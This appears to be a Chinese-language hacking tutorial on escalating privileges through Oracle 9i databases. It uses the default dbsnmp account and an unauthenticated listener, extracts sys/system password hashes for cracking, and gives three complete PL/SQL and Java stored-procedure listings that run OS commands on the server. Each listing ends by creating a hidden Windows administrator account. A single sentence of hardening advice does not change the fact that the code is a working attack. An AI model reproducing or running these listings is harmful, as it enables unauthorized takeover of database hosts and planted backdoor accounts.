Oracle 通过 PL/SQL 执行命令 —— 需要开放相应端口及权限

先用 set current_listener IP 连上监听器，用 version 命令看了一下版本（是 Oracle 9i）；再查看了一下服务，监听器没有做任何认证，直接就拿到了服务名。打开 SQL*Plus，敲入 connect dbsnmp/dbsnmp@服务名 连接，然后执行 select distinct a.name from sys.user$ a, sys.sysauth$ b where a.user#=b.grantee# and b.privilege#=4; 列出被授予 DBA 角色的账户（这些账户的账户名与密码相同），这样就可以通过 Oracle 来执行 OS 命令了。注意：dbsnmp 账户在 Oracle 9i 安装时是不提示修改默认密码的，它虽然不是 DBA，却能通过它看到很多要命的信息——sys、system 的口令 hash 可以轻松得到，随便找个彩虹表很快就能破解 hash，进而拿下最高权限。防御上，应在安装后立即修改或锁定 dbsnmp 等默认账户，并限制对监听器端口的访问。

利用 Oracle 提权，总的来说常用的有以下几种方法（都要求先拿到一个拥有相应对象创建权限的数据库账户）：

1.通过PL/SQL运行OS命令

  -- 1. PL/SQL external procedure: bind the C function system() exported by
  --    msvcrt.dll as a PL/SQL procedure, so the database server runs OS
  --    command lines. The command executes in the OS context of the extproc
  --    agent, not the client's. This needs the "open ports and privileges"
  --    from the title: at minimum the privilege to create a library, and a
  --    listener configured to launch the extproc agent.
  --    NOTE(review): written against Oracle 9i on Windows; later releases
  --    can restrict which DLLs extproc may load -- verify on the target.
  CREATE OR REPLACE LIBRARY
  exec_shell AS 'c:/windows/system32/msvcrt.dll';
  /
  -- Package spec: a single procedure taking the command line to run.
  CREATE OR REPLACE PACKAGE oracmd IS PROCEDURE exec(cmdstring IN CHAR);
  end oracmd;
  /
  -- Package body: no PL/SQL logic at all -- exec is mapped directly onto
  -- the C symbol "system" in the library declared above.
  CREATE OR REPLACE PACKAGE BODY oracmd IS
  PROCEDURE exec(cmdstring IN CHAR)
  IS EXTERNAL
  NAME "system"
  LIBRARY exec_shell
  LANGUAGE C;
  end oracmd;
  /
  -- Each call hands one full command line to system(); these two create a
  -- local Windows user and add it to the Administrators group.
  exec oracmd.exec('net user FIGJAM 123 /add');
  exec oracmd.exec('net localgroup administrators FIGJAM /add');

2.通过Java运行OS命令

  -- 2. Java stored procedure: the database's embedded JVM spawns the process.
  --    The command's output is not captured and the process is not waited
  --    for; an IOException from exec() propagates to the PL/SQL caller.
  --    NOTE(review): no grant appears in this listing -- the JVM security
  --    policy must already allow this schema to spawn processes (listing 3
  --    grants JAVASYSPRIV for the same purpose); confirm what the target needs.
  CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS
  import java.lang.*;
  import java.io.*;
  public class JAVACMD
  {
      // Fire-and-forget: returns as soon as the process has been started.
      public static void execCommand (String command) throws IOException
      {
          Runtime.getRuntime().exec(command);
      }
  };
  /
  -- PL/SQL call spec mapping JAVACMDPROC(p_command) onto the static method.
  CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2)
  AS LANGUAGE JAVA
  NAME 'JAVACMD.execCommand (java.lang.String)';
  /
  -- Commands are wrapped in cmd.exe /c so shell built-ins resolve.
  exec javacmdproc('cmd.exe /c net user FIGJAM 123 /add');
  exec javacmdproc('cmd.exe /c net localgroup administrators FIGJAM /add');

3. Java 提权（执行命令并回显输出）

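  -- 3. Java stored function: runs a command, echoes its stdout back through
  --    System.out (redirected to DBMS_OUTPUT by the set_output call further
  --    down) and returns the exit code. Fix: the original did `return rc;`
  --    inside `finally`, which silently discards anything thrown out of the
  --    try/catch (e.g. an Error, which catch(Exception) does not handle) and
  --    reports -1 instead; the return now follows the block and the stdout
  --    pipe is closed in finally.
  create or replace and compile
  java source named "Util"
  as
  import java.io.*;
  import java.lang.*;
  public class Util extends Object
  {
      // Runs `args` as an OS command line, copies its stdout to System.out
      // and returns the process exit code, or -1 if exec/wait failed.
      // NOTE(review): only stdout is drained; a command that writes a lot
      // to stderr could block on a full pipe -- confirm for noisy commands.
      public static int RunThis(String args)
      {
          Runtime rt = Runtime.getRuntime();
          int rc = -1;
          BufferedInputStream bis = null;
          try
          {
              Process p = rt.exec(args);
              int bufSize = 4096;
              bis = new BufferedInputStream(p.getInputStream(), bufSize);
              int len;
              byte buffer[] = new byte[bufSize];
              // Echo back what the program spit out
              while ((len = bis.read(buffer, 0, bufSize)) != -1)
                  System.out.write(buffer, 0, len);
              rc = p.waitFor();
          }
          catch (Exception e)
          {
              e.printStackTrace();
              rc = -1;
          }
          finally
          {
              // Release the stdout pipe; deliberately no return here so
              // failures raised above are not masked.
              if (bis != null)
              {
                  try { bis.close(); } catch (IOException ignored) {}
              }
          }
          return rc;
      }
  }
  /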
  -- PL/SQL call spec: RUN_CMD(p_cmd) returns the process exit code as a
  -- NUMBER (-1 when Util.RunThis failed).
  create or replace
  function RUN_CMD(p_cmd in varchar2) return number
  as
  language java
  name 'Util.RunThis(java.lang.String) return integer';
  /
  -- Procedure wrapper that discards the exit code. Defined here but unused:
  -- the calls at the end of the listing invoke RUN_CMD directly.
  create or replace procedure RC(p_cmd in varchar2)
  as
  x number;
  begin
  x := run_cmd(p_cmd);
  end;
  /
  -- SQL*Plus driver. SERVEROUTPUT plus dbms_java.set_output route the Java
  -- System.out writes (the echoed command output) into DBMS_OUTPUT so they
  -- appear in this session; without them the output would presumably not
  -- be visible here.
  variable x number;
  set serveroutput on
  exec dbms_java.set_output(100000);
  -- JAVASYSPRIV is what allows the Oracle JVM to spawn processes for this
  -- schema; it has to be granted by a sufficiently privileged account (DBA)
  -- to the schema owning Util (replace 用户名) before RUN_CMD is called.
  grant javasyspriv to 用户名
  /
  -- The exit code lands in the bind variable :x (PRINT x to view it).
  exec :x := RUN_CMD('net user FIGJAM /add');
  exec :x := RUN_CMD('net localgroup administrators FIGJAM /add');